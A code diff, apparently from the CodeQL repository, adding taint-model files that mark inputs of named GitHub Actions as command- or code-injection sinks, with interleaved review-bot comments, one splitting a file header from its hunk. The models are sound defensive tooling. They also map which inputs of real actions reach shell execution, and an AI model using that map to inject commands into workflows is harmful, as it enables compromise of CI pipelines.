diff --git a/actions/ql/lib/ext/manual/changesets_action.model.yml b/actions/ql/lib/ext/manual/changesets_action.model.yml
new file mode 100644
index 000000000000..e1b34c67d492
--- /dev/null
+++ b/actions/ql/lib/ext/manual/changesets_action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
+ - ["changesets/action", "*", "input.version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
new file mode 100644
index 000000000000..9f212f145f6a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
+ - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
new file mode 100644
index 000000000000..49a399355443
--- /dev/null
+++ b/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/coursier_cache-action.model.yml b/actions/ql/lib/ext/manual/coursier_cache-action.model.yml
new file mode 100644
index 000000000000..319f712a9bf1
--- /dev/null
+++ b/actions/ql/lib/ext/manual/coursier_cache-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
new file mode 100644
index 000000000000..772a5d59e188
--- /dev/null
+++ b/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
new file mode 100644
index 000000000000..3d1366558fe0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml
new file mode 100644
index 000000000000..3da214d62feb
--- /dev/null
+++ b/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
new file mode 100644
index 000000000000..37c6af1f99e1
--- /dev/null
+++ b/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml b/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml
new file mode 100644
index 000000000000..fecc9e5ce055
--- /dev/null
+++ b/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"]
diff --git a/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
new file mode 100644
index 000000000000..34eac65cdc8c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"]
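Review bot: The sink kind `sql-injection` on both dailydotdev/action-devcard rows appears nowhere else in this set of models, which otherwise only use `command-injection`, `code-injection` and `envvar-injection`; unless an actions query actually consumes a `sql-injection` kind, these two sinks are dead and a tainted `commit_branch` or `commit_filename` will never be reported. The input names suggest the values are interpolated into a git commit/push invocation, which is the situation the other git-oriented models (e.g. endbug/latest-tag's `input.ref`) classify as `command-injection`. I would confirm against the action's implementation and, if it is a shell interpolation, change both rows to `"command-injection"`, or otherwise add a one-line `#` comment above them explaining which query consumes `sql-injection`.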
diff --git a/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
new file mode 100644
index 000000000000..ba5de3c24706
--- /dev/null
+++ b/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
new file mode 100644
index 000000000000..27a8ffae1857
--- /dev/null
+++ b/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
new file mode 100644
index 000000000000..b87f18629996
--- /dev/null
+++ b/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
+ - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
new file mode 100644
index 000000000000..7ead429278e5
--- /dev/null
+++ b/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"]
diff --git a/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
new file mode 100644
index 000000000000..6b900caef361
--- /dev/null
+++ b/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
new file mode 100644
index 000000000000..cafdfada61ba
--- /dev/null
+++ b/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection", "manual"]
\ No newline at end of file
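Review bot: determinatesystems_magic-nix-cache-action.model.yml (like delaguardo_setup-clojure.model.yml just above it) is committed without a terminating newline, as the `\ No newline at end of file` marker shows, whereas most sibling models end with one and a few others carry one or two trailing blank `+` lines instead. These hand-maintained model files are edited row by row, so an inconsistent EOF convention means the next person who appends a sink row produces a diff that also rewrites the previous last line, and editors that auto-fix EOF will generate whitespace-only churn. I would settle on a single trailing newline with no padding blank lines and apply it across the new `ext/manual` files, starting with a newline after the `input.source-binary` row here.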
diff --git a/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
new file mode 100644
index 000000000000..646d54ac92ab
--- /dev/null
+++ b/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
new file mode 100644
index 000000000000..f316799fa4a7
--- /dev/null
+++ b/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/docker_build-push-action.model.yml b/actions/ql/lib/ext/manual/docker_build-push-action.model.yml
new file mode 100644
index 000000000000..116c231c30a4
--- /dev/null
+++ b/actions/ql/lib/ext/manual/docker_build-push-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
new file mode 100644
index 000000000000..a60f1cc9fb1a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
new file mode 100644
index 000000000000..eafb7d1fc3aa
--- /dev/null
+++ b/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"]
+
+
diff --git a/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml b/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml
new file mode 100644
index 000000000000..b4aab55179b3
--- /dev/null
+++ b/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.git-directory", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.description", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml b/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml
new file mode 100644
index 000000000000..3b7b4aea7133
--- /dev/null
+++ b/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
+ - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
new file mode 100644
index 000000000000..b09bec4a1d42
--- /dev/null
+++ b/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml
new file mode 100644
index 000000000000..cb71f958365e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
+ - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
new file mode 100644
index 000000000000..c4f8a3efe3ea
--- /dev/null
+++ b/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"]
diff --git a/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
new file mode 100644
index 000000000000..aa9dd5096610
--- /dev/null
+++ b/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
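Review bot: The franzdiebold/github-env-vars-action rows declare the PR title and description as step outputs (`output.CI_PR_DESCRIPTION`, `output.CI_PR_TITLE`), but an action whose stated purpose is exporting environment variables presumably exposes them to later steps as `$CI_PR_TITLE`/`$CI_PR_DESCRIPTION` in the job environment rather than via `steps.<id>.outputs.*`; the cypress-io/github-action model in this same change uses the `env.GH_BRANCH` form for exactly that case. If so, a `run:` step that interpolates `${{ env.CI_PR_TITLE }}` or `$CI_PR_TITLE` would never be matched by these sources and the attacker-controlled title/body would go unreported. I would check the action's `action.yml`/source for `core.exportVariable` versus `core.setOutput` and change the rows to `env.CI_PR_DESCRIPTION` and `env.CI_PR_TITLE` (keeping the `output.` rows as well only if both mechanisms are used).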
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
+ - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml
new file mode 100644
index 000000000000..767c77310e8d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
+ - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
new file mode 100644
index 000000000000..6df70ae927a6
--- /dev/null
+++ b/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
new file mode 100644
index 000000000000..3f43f195f68f
--- /dev/null
+++ b/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/getsentry_action-release.model.yml b/actions/ql/lib/ext/manual/getsentry_action-release.model.yml
new file mode 100644
index 000000000000..3c63d7b845f1
--- /dev/null
+++ b/actions/ql/lib/ext/manual/getsentry_action-release.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
+ - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/github_codeql-action.model.yml b/actions/ql/lib/ext/manual/github_codeql-action.model.yml
new file mode 100644
index 000000000000..6db033ebd9fd
--- /dev/null
+++ b/actions/ql/lib/ext/manual/github_codeql-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml b/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml
new file mode 100644
index 000000000000..a376aefd6f60
--- /dev/null
+++ b/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
new file mode 100644
index 000000000000..51ca0af21c3d
--- /dev/null
+++ b/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
new file mode 100644
index 000000000000..28d118e6b611
--- /dev/null
+++ b/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
new file mode 100644
index 000000000000..7e045f8380a4
--- /dev/null
+++ b/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
new file mode 100644
index 000000000000..2a6d3fac1df7
--- /dev/null
+++ b/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
new file mode 100644
index 000000000000..a3c590ec473e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
new file mode 100644
index 000000000000..98a61516c600
--- /dev/null
+++ b/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml
new file mode 100644
index 000000000000..17aaecf80c56
--- /dev/null
+++ b/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
+ - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/hexlet_project-action.model.yml b/actions/ql/lib/ext/manual/hexlet_project-action.model.yml
new file mode 100644
index 000000000000..60a68ed2f8d2
--- /dev/null
+++ b/actions/ql/lib/ext/manual/hexlet_project-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
new file mode 100644
index 000000000000..3c0820b6878c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
new file mode 100644
index 000000000000..99146ff21be0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
+ - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
new file mode 100644
index 000000000000..7790454a9349
--- /dev/null
+++ b/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml b/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml
new file mode 100644
index 000000000000..e3cea2e555a4
--- /dev/null
+++ b/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml
new file mode 100644
index 000000000000..c3346d689456
--- /dev/null
+++ b/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
new file mode 100644
index 000000000000..2e2c0cff0ef8
--- /dev/null
+++ b/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
new file mode 100644
index 000000000000..97b631cdfcd6
--- /dev/null
+++ b/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "filename", "manual"]
